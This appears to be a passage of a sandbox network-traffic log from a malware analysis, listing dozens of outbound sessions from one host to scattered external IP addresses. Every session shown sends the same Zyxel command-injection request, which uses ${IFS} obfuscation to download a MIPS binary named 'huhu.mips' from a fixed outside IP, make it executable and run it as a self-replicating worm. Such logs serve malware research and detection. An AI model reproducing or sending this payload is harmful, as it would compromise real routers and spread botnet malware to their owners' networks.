                                              Jan 29, 2024 07:04:00.211410046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6911192.168.2.1438818107.247.179.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211452007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6912192.168.2.145102274.77.191.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211477041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6913192.168.2.1451932154.48.32.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211528063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6914192.168.2.145531082.55.252.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211580038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6915192.168.2.145890678.93.241.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211611032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6916192.168.2.145083888.33.66.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211663961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6917192.168.2.145361237.70.172.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211699963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6918192.168.2.1445616210.102.189.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211747885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6919192.168.2.1440716168.23.187.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211781025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6920192.168.2.1445102181.188.52.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211834908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6921192.168.2.143850697.157.114.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211859941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6922192.168.2.1445824150.18.75.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211916924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6923192.168.2.143456035.196.124.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211980104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6924192.168.2.1439570166.254.214.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212008953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6925192.168.2.145919225.132.195.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212042093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6926192.168.2.143312679.65.54.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212086916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6927192.168.2.1445928187.67.57.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212127924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6928192.168.2.144040624.194.12.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212168932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6929192.168.2.145583231.157.186.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212199926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6930192.168.2.143551486.62.238.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212245941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6931192.168.2.145743649.89.57.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212280035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6932192.168.2.1460414167.73.105.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212312937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6933192.168.2.1447344218.150.201.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212362051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6934192.168.2.1452804155.16.89.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212399960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6935192.168.2.143380419.240.180.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212450027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6936192.168.2.1457110197.44.160.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212497950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6937192.168.2.1454094167.39.229.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212519884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6938192.168.2.143458899.68.15.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212553024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6939192.168.2.143589836.53.199.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212613106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6940192.168.2.144860867.2.251.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212645054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6941192.168.2.1456766123.18.246.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212703943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6942192.168.2.144064838.234.74.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212750912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6943192.168.2.144376637.71.16.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212788105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6944192.168.2.144782854.88.141.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212826014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6945192.168.2.1455086188.57.72.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212876081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6946192.168.2.14469029.218.176.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212903023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6947192.168.2.145531290.35.181.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212929964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6948192.168.2.1440492210.197.11.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212969065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6949192.168.2.1436848154.59.186.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.212994099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6950192.168.2.1441908166.200.43.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213027000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6951192.168.2.145098077.28.216.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213089943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6952192.168.2.1443788114.237.211.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213124037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6953192.168.2.143979637.126.193.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213171005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6954192.168.2.144244862.61.190.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213193893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6955192.168.2.1432826212.28.151.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213238001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6956192.168.2.1451976173.97.98.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213294029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6957192.168.2.1446992195.220.137.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213315010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6958192.168.2.1460198147.232.115.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213355064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6959192.168.2.1438516125.44.194.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213393927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6960192.168.2.1440626142.123.239.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213433981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6961192.168.2.1433334134.207.242.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213449955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6962192.168.2.1432892128.251.14.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213500977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6963192.168.2.145977699.168.99.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213530064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6964192.168.2.145022827.165.114.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213584900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6965192.168.2.1447118171.227.10.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213613033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6966192.168.2.1433626213.125.213.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213653088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6967192.168.2.145539658.119.47.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213675976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6968192.168.2.1447942165.55.202.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213707924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6969192.168.2.1444126140.218.19.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213761091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6970192.168.2.1445628168.83.216.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213787079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6971192.168.2.1435052105.41.236.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213845015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6972192.168.2.143851849.137.24.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213879108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6973192.168.2.1435822160.33.43.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.213910103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6974192.168.2.143862254.3.235.92443
                                              TimestampBytes transferredDirectionData
